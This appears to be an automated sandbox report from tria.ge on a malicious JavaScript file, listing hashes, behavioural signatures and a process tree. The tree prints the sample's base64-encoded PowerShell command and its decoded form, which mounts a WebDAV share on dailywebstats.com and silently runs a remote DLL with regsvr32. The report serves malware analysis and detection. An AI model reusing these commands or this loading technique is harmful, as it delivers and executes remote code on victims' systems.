Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 117s
max time network: 120s
platform: windows7_x64
resource: win7-20240705-en
resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
submitted: 26/07/2024, 12:37
Static task: static1
Behavioral task: behavioral1
  Sample: 24512273992155119888.js
  Resource: win7-20240705-en
Behavioral task: behavioral2
  Sample: 24512273992155119888.js
  Resource: win10v2004-20240709-en
General
Target: 24512273992155119888.js
Size: 16KB
MD5: 81f40ac6804ff55ae429b1f889d43919
SHA1: 622b8e291d62965f213d0171863bf0cca613817c
SHA256: 729ba61dd005270ac9ea1a3fcacbfd615c2b1ffcaa8c02477205590c1bd491f4
SHA512: 82c6bdb877e62b5791c81238bcb6c9dcb69106493defdb866ed6bcf467cb87213c9e8a1007524f7de8c6c19566fc3f7dd92d93186908a03e816c96118c97aaa0
SSDEEP: 192:6iAQi4t9L0q0hh5p1hKJHhFSAlnFaygFSAlnFCt:6i3DUmBPXyJXe
Malware Config
Signatures
- Obfuscated Files or Information: Command Obfuscation (1 TTPs)
  Adversaries may obfuscate content during command execution to impede detection.
- Command and Scripting Interpreter: JavaScript (1 TTPs)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  2432  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description               pid   Process
  Token: SeDebugPrivilege   2432  powershell.exe
- Suspicious use of WriteProcessMemory (11 IoCs)
  description                        pid   Process          procid_target
  PID 2708 wrote to memory of 2432   2708  wscript.exe      30
  PID 2708 wrote to memory of 2432   2708  wscript.exe      30
  PID 2708 wrote to memory of 2432   2708  wscript.exe      30
  PID 2432 wrote to memory of 2484   2432  powershell.exe   32
  PID 2432 wrote to memory of 2484   2432  powershell.exe   32
  PID 2432 wrote to memory of 2484   2432  powershell.exe   32
  PID 2432 wrote to memory of 2732   2432  powershell.exe   33
  PID 2432 wrote to memory of 2732   2432  powershell.exe   33
  PID 2432 wrote to memory of 2732   2432  powershell.exe   33
  PID 2432 wrote to memory of 2732   2432  powershell.exe   33
  PID 2432 wrote to memory of 2732   2432  powershell.exe   33
Processes
C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\24512273992155119888.js
  - Suspicious use of WriteProcessMemory
  PID:2708
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADQANwA4ADMANgAyADcAOQAxADMAOAAxADUALgBkAGwAbAA=
    (the -EncodedCommand argument is base64 over UTF-16LE and decodes to the two child commands below: net use \\dailywebstats.com@8888\davwwwroot\ ; regsvr32 /s \\dailywebstats.com@8888\davwwwroot\4783627913815.dll)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2432
    C:\Windows\system32\net.exe
      "C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\
      PID:2484
    C:\Windows\system32\regsvr32.exe
      "C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\4783627913815.dll
      PID:2732